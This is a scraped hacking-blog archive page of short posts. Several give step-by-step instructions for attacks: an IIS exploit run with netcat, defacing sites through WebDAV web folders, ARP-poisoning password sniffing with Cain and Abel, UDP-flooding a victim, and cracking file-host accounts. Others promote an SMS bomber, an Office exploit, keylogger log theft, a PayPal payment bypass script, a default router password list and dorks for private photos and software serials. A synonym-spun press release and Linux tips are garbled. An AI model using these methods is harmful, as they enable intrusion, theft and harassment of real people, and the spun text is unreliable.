Home » Archives for March 2011
Learn How To Hack Web Servers
c:\>iishack.exe 80 /ncx.exe
c:\>nc 80
- Install latest service pack from Microsoft.
- Remove IPP printing from IIS Server
- Install firewall and remove unused extensions
- Implement aggressive network egress filtering
- Use IISLockdown and URLScan utilities
- Regularly scan your network for vulnerable servers
- Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be in accessible.
- This is done by appending "+.htr" to a request for a known .asp (or .asa, .ini, etc) file.
- appending this string causes the request to be handled by ISM.DLL, which then strips the '+.htr' string and may disclose part or all of the source of the .asp file specified in the request.
Attack Methods | Exploit / Attack Methodology By making a specially formed request to IIS, with the name of the file and then appending around 230 + " %20 " (these represents spaces) and then appending " .htr " this tricks IIS into thinking that the client is requesting a " .htr " file . The .htr file extension is mapped to the ISM.DLL ISAPI Application and IIS redirects all requests for .htr resources to this DLL. |

Core Security Integrates CORE IMPACT Pro with Metasploit Project
Core Security Technologies, bourgeois of CORE Effect Pro, the most sweeping production for proactive endeavour security investigating, today declared that it has created a fully nourished discipline compounding between its flagship software set and the Metasploit open-source tap possibility.
With today's organizations using incursion testing to strategically trial their vulnerabilities and IT defenses, Ngo Instrument now offers both nonrecreational onslaught testers and operational protection staffers who use Modify Pro the cognition to tap direct into the open-source functionality of Metasploit to influence out vulnerability psychotherapy.
By providing the chance to use Metasploit in concert with Effect Pro, perception testers instrument now be healthy to apprize all the benefits of Core's commercial-grade, automated solution - with its monolithic repository of professionally industrial exploits, economical and easy-to-use program and in-depth reporting capabilities - alongside the advisable noted staring thing send.
Through the desegregation, testers faculty now be fit to:
1. Get a system compromised during investigating with Metasploit into the Touch environs and deploy an Touch Pro Functionary. The Official is a patented, syscall agent load that allows users to:
* Displace Upshot Pro's ladened extent of automatic perception testing capabilities from the compromised scheme.
* Leverage IMPACT's wide selection of commercial-grade exploits, plus denary pre- and post-exploitation capabilities for in-depth, omnibus attempt copy.
* Marcher perception tests to different systems, mimicking an attacker's attempts at identifying and exploiting paths of imperfectness to backend systems and aggregation.
2. Use Combat Pro's automated Fast Incursion Run (RPT) to utilise vulnerabilities, then begin Metasploit's db-autopwn feature and afterwards upload the results affirm into Modify Pro. This allows users with fewer breeding and skillfulness to panorama Metasploit investigation accumulation within the IMPACT surround.
"We've long respected the acquisition of H.D. Thespian, his team and the district of Metasploit contributors in creating a sumptuous tap hypothesis that offers practised testers a reach of capabilities, and we loved to egest it easier for those who require to use Metasploit alongside Set Outcome Pro to do so," said Fred Pinkett, vice chairwoman of fluid direction at Nucleus Warrantee. "By message paid testers and warrantee body greater power to centralize their assessments and united their Metasploit efforts into their Event Pro deployments, we think that we're providing the market with an enlarged opportunity to communicate out Change Pro-Metasploit combining gift officially come in the close version of CORE Alter Pro, due to board from Nucleus Certificate in Apr 2010.
"As someone who utilizes both CORE Fight Pro and Metasploit, it's invaluable to see Nucleus flying towards integrating in this way," said Steve Shead, Administrator of IT & Info Warrantee Functionary and at CafePress.com. "It faculty make testers many orbit for umbrella investigation and categorization, and another boulevard of affliction checking by mercantilism Metasploit experimentation results position into Event Pro. It's pleasing to see Ngo targeting their development efforts into providing automatic onset investigation capabilities that are as stretched and propulsive as humanly workable; ultimately this agency t
mechanism."
"The compounding the Metasploit structure with Change Pro module define a new era for vulnerability agreement," said Chris Nickerson, CEO of Lares Consulting. "Adult onrush testers and enterprises similar present now help from the exploits of Metasploit while existence competent to investing the right profession and reporting of Touch Pro. The most reliable mercenary means merging with the extravasation furnish research of the subject inspiration community will surely be a hit for all."

{Linux} Tips and Tricks
Are you a unix geek ? Here are both indispensible linux tips and tricks which are staleness for new and knowledgeable users alike.Lets change a aspect at them-More Linux Tips and tricks for geeks and newbies alike
Hurrying up your alcoholic journeying
Get faster file dealings by using 32-bit transfers on your cruel force
Conscionable add the line:
hdparm -c3 /dev/hdX
to a bootup script.If you use SuSE or remaining distros based on SYS V,
/sbin/init.d/boot.localised
should manipulate for you. This enables 32-bit dealings on your marmorean ride. On whatever systems it can alter soul action by 75%. To trial your show vantage, write:
hdparm -t -T /dev/hdX
Author DOS-like commands
More grouping are unwinding to Linux because they avoid the stability of gracious old DOS. In that wanton, more users are typewriting DOS commands (which originated from UNIX in the premiere abode) that lie smooth but make errors. The order "cd.." in DOS is dead binding, but Linux balks. This is because "cd" is a mastery, and any constant for that dictation staleness be unconnected from the code book application in your domicile directory to modify the file ".bashrc". The point is there on utility, this hides the line from inborn ls representation.
Add the lines:
name cd/="cd /"
a.k.a. cd~="cd ~"
alias cd..="cd .."
And I usually add these...
name md="mkdir"
name rd="rmdir -i"
a.k.a. rm="rm -i"
and my position and comfort lover a.k.a....
a.k.a. ls="ls --color"
name is a compelling puppet, and can be victimised in the .bashrc book as surface as from the compel connection. You can, if you need to pass the reading, create your own group of bomb commands to agree how you run. As longitudinal as you put them in your .bashrc record, they'll be there everytime you log in. Notation that if you oft log in as structure, you power require to simulate /home/username/.bashrc to /root/.bashrc to remain yourself lucid.
Scene your timezone
The timezone under Linux is set by a symbolic statement from /etc/localtime[1] to a enter in the /usr/share/zoneinfo[2] directory that corresponds with what timezone you are in. For model, since I'm in Southeast Australia, /etc/localtime is a symlink to /usr/share/zoneinfo/Australia/South. To set this join, type:
ln -sf ../usr/share/zoneinfo/your/zone /etc/localtime
Pose your/zone with something suchlike Australia/NSW or Australia/Perth. Screw a lie in the directories under /usr/share/zoneinfo to see what timezones are purchasable.
1. This assumes that /usr/share/zoneinfo is linked to /etc/localtime as it is low Red Hat Unix.
2. On senior systems, you'll effort that /usr/lib/zoneinfo is utilised instead of /usr/share/zoneinfo. See also the ulterior writing ``The period in both applications is wicked''.
How to do approving with tar ?
You can mantain a position of files that you with to voice into a enter and tar it when you greet.
tar czvf tarfile.tar.gz -T list_file
where list_file is a acerate name of what you poverty to allow into the tar
i.e:
/etc/smb.conf
/root/myfile
/etc/ppp (all files into the /etc/ppp directory)
/opt/gnome/html/gnome-dev-info.html
How to protect a computer from responsive to sound ?
a panduriform "sound 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all" instrument do the fob... to grow it back on, only
"ring 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all"
Check adjusted for statesman tips and tricks.
Cheers

Use SSH Tunneling to surf net invisibly
Without leaving your seat,you have a way to control a computer which ay be located anywhere on this planet.

- The site is normally inaccessible from your current location (School/Work)
- You do not want your connection monitored (You’re using a WiFi hotspot/You’re in a country that monitors/censors your internet usage)
Step One: Setting Up the Tunnel
All common Linux distributions come with openssh packages. To check whether you have ssh installed already type the command "which ssh". Gentoo has opensh package preinstalled,so no tension :)
First we need to SSH to the server that we want to tunnel through, open up terminal and type the following command
ssh -NDReplace@
Practical Example:
ssh -ND 2945 [email protected]Now enter your password as usual, and it will hang after authentication, which is perfectly normal as it isn’t an interactive session- Now minimize the terminal and open Firefox.
Step Two: Configuring Firefox
In Firefox, Go to (Depending upon which version you are using)
preferences -> advanced -> Network -> connection settingsA new window should appear,select the “Manual Proxy Configuration” option, you’ll need to type some information in the ‘SOCKS Host’ section.
or
Tools –> options –> Advanced –> Network –> settings
Host: localhostSave your changes..Just to make sure it worked, check your IP with an online IP checker :)
Port: Port you used in the SSH command earlier.
Happy Surfing

Beaver's SMS Bomber Pro
Features Include:
Full Feature List:
Custom SMTP Server (Make Sure You Type It Right)
Custom Carrier Gateway (If Your Victims Gateway Is Not In The Large List You May Find And Enter it Yourself)
Custom Number Of SMS To Send (Finally Have Where You Can Enter Any Amount To Send)
Save/Load Settings (Will Save Everything You Enter In The Fields, Restarting Your Computer Will Lose The Saved Settings)
Fixed XP GUI Issues
Stop Bombing At Any Time
Watch The Number Of SMS Sent In The Title Bar
No Longer Freezes While Sending
Added A Recent slave's Box Where You Can Select An Entry And Right-Click It To Bomb It Again Or Delete It From The List
Save/Load Recent Victims List
GMail Is The Default SMTP Server That Is Used Which Has A Limit On The Number That Can Be Sent
Has A Lot Of Carriers Already Pre-Entered For You.
SMS Looks Like
FRM: Senders Email
SUBJ: Subject
MSG: Message
What Is New In The Pro Version:
New GUI
Error Handling, For Example If There Was An Error Sending The Message It Will Ask You If You Want To Change The E-mail/Password You Are Using. This Is Just One Of The Many Error Handling I Have Added.
DOWNLOAD :
http://rapidshare.com/#!download|536tl2|335533492|Beaver_s_SMS_Bomber_Pro.exe|1089

Hack about 80% of every website out there
You kids need to stop asking for someone else to hack your "friends" forum, your girlfriends myspace page, etc.
You want to learn to hack, stop asking stupid questions.
There is ONE tool, that was created originally to protect from hackers. Unfortunately, it's one of the best friends a hacker will ever have :
It's called Acunetix.
Acunetix is a tool that scans websites for known vulnerabilities. It will list all possible sql, xss, html injections, all java injections, all passwords and database weaknesses, all ftp weaknesses, etc. All form submissions exploits that the website can be targeted with. Remote upload and download vulnerabilities.
It will work in 80% of the cases, its database is updated regularly, but websites with latest updates and a good admin might not be targetable.
So here's the thing. Before you post anymore questions such as : "Can this website be hacked ?" or "How do I hack this forum ?", download Acunetix in the link below (I couldn't be bothered uploading a new one).
DOWNLOAD :
Acunetix Full Version HERE
PASSWORD : hf.net
(Uploaded by me, 100% clean)
Simply install it and copy the crack folder content into your Acunetix folder (replace files), and when you start the program, click on New Scan, follow the steps.
It will answer most of your questions. Take any known website, scan them and you'll find lots of little "medium risk" security problems etc. The program will explain what the potential harms are, not how to do them. The rest is up to you, do a bit of research, learn by yourself.
So use Acunetix, and stop asking stupid things that just make people think you have a pea for a brain.
Oh, and last tip : http://www.google.com is your friend. Don't forget it before you ask anything else.

Darkjumper v5.8 Sqli,Lfi,Rfi,Rce scanner
Darkjumper v5.8 Sqli,Lfi,Rfi,Rce scanner
Here are some key features of "Darkjumper":
· scan sql injection, rfi, lfi, blind sql injection
· autosql injector
· proxy support
· verbocity
· autoftp bruteforcer
· IP or Proxy checker and GeoIP
Requirements:
· Python
Download link: http://mac.softpedia.com/get/Security/Darkjumper.shtml

Bypass Websense or Cyberoam
Regards
Adnan Anjum

Use Google to get almost any software's serial no [Mr.MindfReak]
Most of the people downloading trial and using it, only after the expiration of trial they try for crack, Serial No, Keygen, Patch....
But many don't known where to get Serial No, Some websites may be infect your system with Trojan horse, Viruses, Ad ware, Spy ware....
So for beginners this is a simply way to find hack with less effort and it saves time to, But make sure you have anti virus activated before trying to get some Serials, Patches to avoid data loss
Just follow the steps as instructed below
1) Go to Google
2) type this syntax in search bar " 94FBR"
3) Replace Product name with desired software and leave a space then type 94FBR
4) Press enter, thats it
Now you receive Many pages which contains Serial no, Crack, Patches....
Just make a try, this simple trick works for many peopl.
Demo: 94fbr office 2007
(Its will list the pages contains the keys for Office 2007)

Google trick to find private pictures!
Maybe you need some pictures for your school work.
Of course you can go to a dedicated website where you can find lot of free pictures.
But you can also dig some private pictures directories.
Try this little code in Google, you may find lot of Non public pictures
intitle:index.of +"Indexed by Apache::Gallery" |
intitle:index.of +"Indexed by Apache::Gallery" +paris |
If you want to verify if your own private pictures ares indexed, just paste this code in Google.
site:www.YourSite intitle:index.of +"Indexed by Apache::Gallery" |

IIS EXPLOIT [For Xp And Win7]
# open run
# type-
%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
and press enter !
#A new window name "WEB FOLDER" gets open
#Right click and click on New, Add Web Folder then enter your vulnerable website address.
#then next….finish
# now You can insert your page with name index.html by simply copy pasting.
Also after getting access to the website…Many websites don’t allows you to
add your page. so leave them.
#Dork- "Powered by IIS" or use your own unique dork.
Windows 7-
#Click Start.
#Click Computer.
# In the following dialog click Map Network Drive.
# On the Map Network Drive dialog, click "Connect to a Web site that you can use to store your documents and Pictures" this will pop up the "Welcome to the Add Network Location Wizard".
# Click on Next.
# Click on ”Choose a custom network location”.
# Click on Next.
# Now type the web folder address that you want to access.
# Enter a NAME to help you identify the web folder and click Next.
# Place a checkmark on ‘Open this network location when I click finish’.
# Click Finish.
and insert your deface page !!

How To Sniff Passwords With Cain And Abel
Run Cain and Abel as administrator
Go to the tab that says sniffer
Go to the upper right corner under the Cain pciture and enable the sniffer
select your adapter (usually the one that has a listed Ip address)
Click of the blue Plus sign
Leave everything as is and press ok
Right click on each of ip addresses that come up
Resolve the host name for each one of them
Go to the bottom of the screen and hit the APR tab
Click on the top box
Click the blue plus sign
Hind the computer you want get passwords/information from in the left hand box
Highlight everything that comes up in the righthand box
Go to the upper right hand corner, by the sniffer and enable the APR poisener
To Find passwords, go to the bottem of the screen where it says passwords
Here you will find all usernames and passwords of the person you have poisened (Most of the passwords will be in HTTP)
If you didn't understand this look below:

How to use Net-Tools! Best Tool Ever!
Net Tools is cutting-edge security and network monitoring software for the Internet and Local Area Networks, providing clients with the ability and confidence to meet the challenges of tomorrow's technology. Keeping pace with the industry trends, we offer professional tools that support the latest standards, protocols, software, and hardware for both wired and wireless networks. The main goal is the creation of high quality software. Net Tools is a very strong combination of network scanning, security, file, system, and administrator tools useful in diagnosing networks and monitoring your PC and computer's network connections for system administrators. Next to the essential core tools it includes a lot of extra valuable features. It’s a Swiss Army knife for everyone interested in a set of powerful network tools for everyday use. This all-in-one toolkit includes also a lot of handy file and system utilities next to the huge amount of network tools. The menus are fully configurable, so in this way you won’t get lost in the extremely large amount of essential tools. All the additional features will make this application a must have for all system administrators. There are numerous constructive and valuable applications included in Net Tools that can be used for a great amount of purposes. The latest version of Net Tools is hybrid; it means that it’s capable of working together with applications that are made and designed for Net Tools, so in this way more flexibility and user-friendliness is obtained. This software is designed for the Microsoft Windows OS (Windows 98, NT, 2000, 2003, XP, Vista). It’s entirely compatible and has thoroughly been tested on Windows XP. With the 175+ tools it is a great collection of useful tools for network users. The size of Net Tools 5.0.70 is approximately 25 Mb.
Some screenshots!
http://mabsoft.com/ntscreenshot1.JPG
http://mabsoft.com/ntscreenshot2.JPG
http://mabsoft.com/ntscreenshot3.JPG
http://mabsoft.com/ntscreenshot4.JPG
http://mabsoft.com/ntscreenshot5.JPG
http://mabsoft.com/ntscreenshot6.JPG
http://mabsoft.com/ntscreenshot7.JPG
http://mabsoft.com/ntscreenshot8.JPG
http://mabsoft.com/ntscreenshot9.JPG
Some features of Net Tools
Net Tools 5.0 (build 70) contains a whole variety of network tools.
1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)
Many extra features and utilities are included in this package!
Now, Lets show you how to use some of my favorite tools!
The IP Sniffer!
Well, First of all you want to open Net-Tools.
Now click on Start<Exterior Tools<Internet Tools<Advanced Packet Sniffer.
Now a window should pop up, From there do you see the three tabs under "start logging?" Click on UDP.
Now, Open the chat window you are using to talk with someone, I believe it can be used with almost anything, [just make sure you dont have any background programs running] Once you have the chat open, Click on "Start Logging" And type to him, As soon as you do that, Click "Stop Logging". Now the IP that isn't yours should be the victims. If there is multiple IPs, Just look for the one that appears the most.
The UDP Flooder!
Go to Start<Network Tools and scroll down some till you see "UDP Flooder"
This tool can actually be used to DoS someone! A Actual computer!
The only down fall is that you must have a Dedicated Box, Which cost... eh somewhere around 80$ a month.
If you do have a Box, Just put Net Tools on the box.
Once you have Net Tools on your box, Enter the victims IP, Enter some random data such as [jklsahdakljsdh] and copy and paste it like TWO times. Put the speed to 10 and click start!
NOTICE** This cannot be used on your PC, Not strong enough! Must be used with a Dedicated Box.
Tutorial IRC Trojan!
Start<System Tools<Tut IRC Trojan.
**NOT TESTED**
Add bytes to a .exe!
Start<File Tools<Add Byes to .EXE
And MANY MANY more! There a hundreds of tools!
Download Here!
-Mr.Mindfreak

Windows 7 ™ SP1 32&64 Genuine
This is the most complete release which includes all available verisons of Windows 7 (except "N" and "E" editions) :
Service Pack 1
Microsoft released the first official service pack for Windows 7 on February 22, 2011. This is an important update that includes previously released security, performance, and stability updates for Windows 7. SP1 also includes new improvements to features and services in Windows 7, such as improved reliability when connecting to HDMI audio devices, printing using the XPS Viewer, and restoring previous folders in Windows Explorer after restarting.
Windows 7 Service Pack 1 is an update that does the following :
- Helps keep PCs supported.
- Provides ongoing improvement to the operating system, by including previous updates delivered over Windows Update as well as continuing incremental updates to the Windows 7 platform based on customer and partner feedback.
- Makes it easy for organizations to deploy a single set of updates.
How to install :
**************
Extract using WinRAR.
- Use ImgBurn** to burn the extracted ISO file called "faXcooL.Windows.7.SP1.ENG.x86-x64.ACTiVATED"
* You can use any other software for this operation (Nero, Alcohol, CloneCD...)
* Burning speed should not be faster than 4x.
- Restart your computer*.
* You can install it from existing OS, but I'll recommend the clean installation.
- Make sure you've seleceted your DVD-ROM/RW drive as a first boot device (BIOS setup)*
* If you don't know how to do that, check this link http://www.hiren.info/pages/bios-boot-cdrom
- The text message will appear "Press any key to boot from CD or DVD...."
* By pressing the key you're entering the setup.
- Select your language, time and currency and keyboard input (optionaly)
- Click "Install now".
- Choose your edition* (x86 is 32-bit, x64 is 64-bit) depending of CPU type you have.
* Note that if you have less than 4GB of RAM, x64 will be useless.
- Click "I accept".
- Click "Custom (advanced).
- Choose your partition/hdd drive where Win7 should be installed and click format.
* Setup will continue automaticly and it will finish after 15-30 min.
- Next step will be username (Image 17).
- Type your password (if you want).
- Choose the third option for next step.
- Select your time zone.
- Select your current location.
- And the last step will be silent auto-activation*
* Your PC will restart for the last time.
And that would be all about installation. You're in Win.
Download:
Part 2 : "http://www.fileserve.com/file/D89E7xm"

Hf & Fs & Fsc & Mu & Df Cookies Cheker program
it's function is to check (hotfile & fileserve & megaupload &filesonic &depositfiles )cookies either it is premium or not
it's function is to check (hotfile & fileserve & megaupload &filesonic &depositfiles )cookies either it is premium or not
note :
fileserve (short) :it is the "PHPSESSID"
fileserve (long) :it is the "cookie"
to check a cookies
1)take cookies copy
2)press "add" or "past from clipboard" to add cookies
3)choose "hotfile" or "fileserve" or"megaupload" or.........
4)press start
5)"start button" will change to "stop" , wait until it change to "start" again and the working cookies will be placed in the textbox (large one)
note :
- you can use "past-start" to skip step 2 & 4
-this program isn't adware or spyware
-file size is 15 Kb only (Very simple program )
Download:
http://www.fileserve.com/file/UhZzZxw
Scan Report :
http://vscan.novirusthanks.org/analysis/cb91ff53af0c9042a60e9181801dc31c/Y29va2llcy1jaGVja2VydjItMi1leGU=/

Windows Xp Doosha [Best look For You Windows]
CCleaner 2.3.1
K-Lite Mega codec pack 5.9.5
klcp_update_596_20100514
AIMP2 mp3 player 2
Winrar Corporat 9.3
Internet Download Manager 5.19.2
Mozilla Firefox 3.6
Code: |
Part 1 : http://www.fileserve.com/file/r8EU7Xj Part 2 : http://www.fileserve.com/file/cRw6z2G |

EXE to Xls Exploit [ms office exploit
Before you attempt to use this Exploit Make Sure you have "Perl" Installed
The converted output file will not be fud i.e .Xls Document but you can hex it to make it Fud{No so Easy Though}
Download Link:-http://sharecash.org/download.php?file=1574741
OR
Download Link:-http://fileme.us/2H7XU

20 reasons: Why people don't receive logs via stealer or KeyLogger
You might have registered on various FTP, PHP sites or even emails to test and get logs of your victims.
I have seen many people complaining about stealers or crypters and KL's. So, this thread may be the right solution/place for you.
Well, if you are not getting logs that doesn't mean stealer or KL is not good or hosting site is bad.
KL = keylogger
There are various reasons why people don't receive logs many times.
I will discuss some of the reasons, which I know. If you know more than these, please feel free to post.
Also, if at some point, I am wrong, please correct me.
If your target has powerful firewall (like ZoneAlarm, Outpost etc...), then it WILL suspect some suspicious behavior and pop-up Internet access privilege. If your target is smart enough, then he/she may block access to your file.
UDP is very much unreliable as compared to TCP. So, UDP doesn't provide error checksum or resending of data. If ur stealer or KL is using TCP connection, then its much better.
If ur exe is anti-Kaspersky or such like that, then well and good.
If ur exe is not anti with any of the above methods, then it may get detected, even by a n00b :P
This is coz, suppose say, ur ftp login info is username: "hello" and password is: "123456". This is info is stored in ur exe and u distributed that. While uploading, ur exe will use the above info to upload logs 2 ur FTP.
If u change the password to "456789", then u know that u hv changed the password of ur FTP acc, but ur EXE doesn't know this. It will use the password as "123456". So, in this case also u won't receive logs.
So, choose the stealer and crypter combination wisely.
If ur customers is using Windows 7, then obviously ur exe will not run on his PC as it can't understand how to execute.
Using tutorial on hexing is a good choice but dun apply ur own logic with that hex tut if u dunno hexing.
Also, dun combine one hex tutorial with another hex tutorial.
This will definitely corrupt ur file. Hahaha, lmao......
So, choose a stealer which have good combination of browser (FF, IE, etc...)

Cracking Hotfile Accounts
http://www.megaupload.com/?d=1EYVVHPA
Virus scan if ya paranoid: http://www.virustotal.com/file-scan/rean...1300352631
This is a simple cracker to use and you do not even need to deal wit using proxies, and there is 2 ways to go about this
1. Load a list of usernames before anything, most common words are registered usernames, but if your lazy here's a list of usernames you can use
http://www.paste-it.com/view/28997726
2. Now for passwords you can either
A - load a small password list of around 50-100 passwords (you don't need anymore then this as most hotfiles have very weak common passwords)
B - You can set the cracker to do username as the password (a lot of hotfile accounts have their password as their username) this is in the Extra Options tab
3. Set the sockets to 30, and the timeout to 9000.
4. Hit start and your good to go. Cracked accounts will start showing up as they are hit. I have selected the option to run the username as the password in this screen shot and cracked quite a few accounts in the 1st minute
Now the only thing is checking every account to see if they are premium or not. If you want just crack premium accounts, you can select the option but you will need proxies for this. The nice thing is that the cracker has a built in proxy checker so it will check and save the good proxies for you.
Here's some proxies if you want to run it with em.
http://www.paste-it.com/view/70815034

How to run your own private chat server
HachaT Server
HachaT IM Client
both can be found here: http://adf.ly/r2YZ
Step 1: Extract contents of both files.
Step 2: Start your HachaT Server and Client programs.
Step 3 (a little bit harder):
Goto http://www.no-ip.com/ and make an account.
Login and click the "Hosts/Redirects" tab.
Click "Add New" on the menu bar to the left.
Change the host name to what you want and don't change anything else.
Click "Create Host".
Now goto http://www.no-ip.com/downloads.php
Download and Install the No-IP Client.
Log into your No-IP client and click "Select Hosts".
Make sure that your host is checked.
Click File;Preferences; and make sure "Run on Start up" is also checked.
Now click refresh on the main client page.
Step 4 (only for people on routers): Port forward to port 2323 using this tutorial as a guide:http://adf.ly/r2ea
Step 5: Type your host link (like this 'host.whatever.com' leaving out http://) and a nickname. Than click connect
Step 6: Share HachaT with your friends and tell them yr server info!

How To Port Forward (Router & Modem Style)
Port forwarding is necessary for using different tools, Such as RATs and uTorrent and so on. Please follow this guide on How To Port Forward and you'll have your port forwarded :)!
Lets Start!
Start off by going to: Start -> Run -> CMD -> And Type IPCONFIG
Now Copy That "Standard Gateway // Default Gateway" IP And Type It Into Your Webbrowser & Log in.
Admin -
Admin - Admin
Admin - Password
Admin - User
Admin - Root
Admin - Custom Password, Check underneath your router for it! ;)
Root - Admin
Root -
Root - Password
Root - Root
Root - Password
Root - Custom Password. Check underneath ;)
User - Root
User -
User - Admin
User - Password
User - User
User - Custom Pass.
And so on.
Once you're logged in, Go to the "port forwarding" or in this case, "Virtual Server"
Virtual Server: Enable / Disable.
Local IP: Found In IPConfig, As IP Adress.
Start Port: The Port You Want To Forward, Start Port.
End Port: The Port You Want To Forward, End Port.
Protocol: TCP & UDP or BOTH
Remark: The Name Of The Wished Forwarded Program.
And When You've Saved The Settings, Go To Canyouseeme.org And Type Your Port In There, And If It Says
Then You've Succeded Your Port Forwarding.
If It Says
You've Failed. Then I Advice You To Take A Look At Portforward.com And Look For Your Router Or Modem, Once You Find It They Have A Port Forward Tutorial There.

HachaT IM by eL3ET
The time has finally come for me to release HachaT (pronounced Hack Chat), and HachaT Server.
HachaT is a free software alternative to MSN and Yahoo. You can run your own server free of registration set up or anything like that just double click and your server is up and running! (if you are on a router port forward port 2323).(if you are on a router port forward port 2323). To use the HachaT client just type in a Nickname and the server IP your trying to connect too.
Like I said this software is completely free and released under the GPL license! Have fun talking to your friends!
HachaT Client Download
HachaT Server Download

Bypass Paypal payment to get some ebooks and scripts for free
javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);
When you are visiting a page using a paypal button, just click the bookmark or paste the code in the URL bar of your navigator.
If it works, you will be redirected to the download page
Else, try another site (or buy it
It works with :
Chrome [X]
Firefox [X]
IE [?] (anyone can test it?)
Opera [X]
Safari [X]
A link the script works on : http://www.ptcexpert.com
If you find another link, please share
